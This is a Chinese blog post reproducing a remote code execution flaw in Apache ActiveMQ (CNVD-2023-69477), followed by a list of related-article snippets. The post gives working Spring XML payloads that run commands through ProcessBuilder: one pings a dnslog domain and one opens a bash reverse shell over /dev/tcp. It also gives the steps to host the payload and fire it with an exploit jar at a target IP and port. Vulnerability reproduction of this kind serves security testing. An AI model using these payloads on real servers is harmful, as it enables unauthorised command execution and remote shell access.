Apache ActiveMQ RCE漏洞复现

最新推荐文章于 2024-04-08 09:34:23 发布
最新推荐文章于 2024-04-08 09:34:23 发布
阅读量833 收藏 11
点赞数 11
分类专栏: web安全 文章标签: apache activemq web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45554491/article/details/135502546
版权

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

1、漏洞版本

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

2、POC

通过dnslog验证的poc.xml

<?xml version="1.0" encoding="utf-8"?>
 
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> 
    <constructor-arg> 
      <list> 
        <value>ping</value>    
        <value>ne5q0v.dnslog.cn</value> 
      </list> 
    </constructor-arg> 
  </bean> 
</beans>

反弹shell的poc.xml

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i >& /dev/tcp/ip/端口 0>&1]]></value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

3、复现过程

1、在本地含有poc.xml的文件夹下开启http服务

python -m http.server                  #默认端口为8000

可以正常访问即为开启成功

在这里插入图片描述

2、通过ActiveMQ-RCE.jar工具进行漏洞验证

java -jar ActiveMQ-RCE.jar tcp://目标ip:目标端口 http://开启http服务的ip:8000/poc.xml

3、命令执行成功,且在dnslog 平台收到dns请求记录
在这里插入图片描述

4、工具地址

ActiveMQ-RCE.jar

在这里插入图片描述

结束语:来自某吧的诗句

很多人看不到未来,其实是看到了未来
咖啡因来自咖啡果
苦难是生命的防沉迷系统

小镇航海家
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache ActiveMQ RCE漏洞复现CNVD-2023-69477
0xSec
10-26 7851
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。
Apache activemq 5.15.5
10-28
阿帕奇的消息队列服务 品
漏洞分析|Apache ActiveMQ RCE漏洞复现CNVD-2023-69477
xuandaoren的博客
10-31 3556
Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。类, 然后重写对应的逻辑,这样在运⾏的时候, 因为。查找顺序的问题, 程序就会优先使⽤当前源码⽬录⾥的。获取到了对应的序列化器之后, 会调⽤它的。⾥⾯获取对应的序列化器。
探索Apache ActiveMQ RCE:一个强大的安全研究工具
最新发布
gitblog_00069的博客
04-08 889
探索Apache ActiveMQ RCE:一个强大的安全研究工具 项目地址:https://gitcode.com/sincere9/Apache-ActiveMQ-RCE 在这个数字化的时代,消息中间件是构建高效、可扩展系统的关键组件。Apache ActiveMQ作为一款开源的消息代理,广泛应用于企业级应用中。然而,与所有软件一样,它也可能存在安全隐患。这就是为什么Apache Activ...
Apache ActiveMQ (版本 < 5.18.3) (CVE-2023-46604)RCE修复方案/缓解方案
士心的博客
10-31 3148
CVE-2023-46604
Apache ActiveMQ 远程代码执行漏洞复现CNVD-2023-69477
huangyongkang666的博客
10-31 4895
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 2638
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
Apache activeMQ漏洞复现
Shanfenglan's blog
12-14 3164
文章目录1. ActiveMQ 反序列化漏洞(CVE-2015-5254)2. ActiveMQ任意文件写入漏洞(CVE-2016-3088)2.1 利用参考文章 1. ActiveMQ 反序列化漏洞(CVE-2015-5254) Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 工具下载地址:http
apache-activemq-5.17.3
12-27
apache-activemq,运行需要依赖的jdk版本为11+
activemqApache ActiveMQ的镜像
01-31
欢迎使用Apache ActiveMQ Apache ActiveMQ是高性能的Apache 2.0许可的Message Broker和JMS 1.1实现。 入门 为了帮助您入门,请尝试以下链接: 入门 建造 例子 我们欢迎您提供各种帮助,以获取有关如何帮助详细...
Apache-ActiveMQ教程.docx
09-13
Apache_ActiveMQ教程
apache-activemq-5.16.0.zip
09-11
apache-activemq-5.16.0.zip
activemq系列漏洞复现
m0_49420271的博客
06-07 2747
vulhub中activemq系列漏洞复现
ActiveMQ反序列化漏洞复现(CVE-2015-5254)
m0_49025459的博客
10-31 931
这里复现的靶场使用的是vulhub搭建的,过多的我就不赘述了,直接启动靶场,启动正确我们访问IP(靶场IP):8161这里以192.168.218.132:8161为例,如果出现下图场景,则证明靶场搭建成。
ActiveMQ高级特性
qq_56224861的博客
04-21 172
引入消息队列之后该如何保证其高可用性 zookeeper+replicated-levelDB-Store的主从集群 异步投递 Async Sends 对于一个Slow Consumer,使用同步发送消息可能会出现Producer堵塞等情况,慢消费者适合使用异步发送--------activeMQConnectionFactory.setUseAsyncSend(true) ActiveMQ默认使用异步发送的模式:除非明确指定使用同步发送的方式或者在未使用事务的前提下发送持久化的消息,这两种情况都是同
3000 台 Apache ActiveMQ 服务器易受 RCE 攻击
网络研究观
11-04 3353
超过三千个暴露在互联网上的 Apache ActiveMQ 服务器容易受到最近披露的关键远程代码执行 (RCE) 漏洞的影响。
[CVE-2023-44604]:Apache ActiveMQ OpenWire 协议远程代码执行漏洞
摔不死的笨鸟的博客
12-18 295
Apache ActiveMQ OpenWire 协议远程代码执行漏洞
ActiveMQ反序列化RCE漏洞复现(CVE-2023-46604)
柠檬i的博客
01-13 2644
Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。首先,启动一个HTTP反连服务器,其中包含我们的。修改xml文件为反弹shell命令。
apache-activemq对应jdk
09-01
Apache ActiveMQ 可以运行在支持 Java 平台的多种 JDK 版本上,包括 JDK 6、JDK 7、JDK 8等等。 对于 Apache AcitveMQ 5.x 版本,它对应的 JDK 版本为 JDK 1.6 或更高版本。这意味着你可以使用 JDK 1.6、JDK 7、JDK 8 或更高版本来运行 Apache ActiveMQ 5.x。 对于 Apache ActiveMQ 4.x 版本,它对应的 JDK 版本为 JDK 1.4 或更高版本。这意味着你可以使用 JDK 1.4、JDK 5、JDK 6、JDK 7、JDK 8 或更高版本来运行 Apache ActiveMQ 4.x。 需要注意的是,较新的 JDK 版本通常会提供更好的性能和安全性,同时也会提供一些新的特性。因此,在选择 JDK 版本时,建议使用最新的稳定版。另外,还应该根据 ActiveMQ 的版本选择最合适的 JDK 版本,以确保兼容性和性能等方面的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值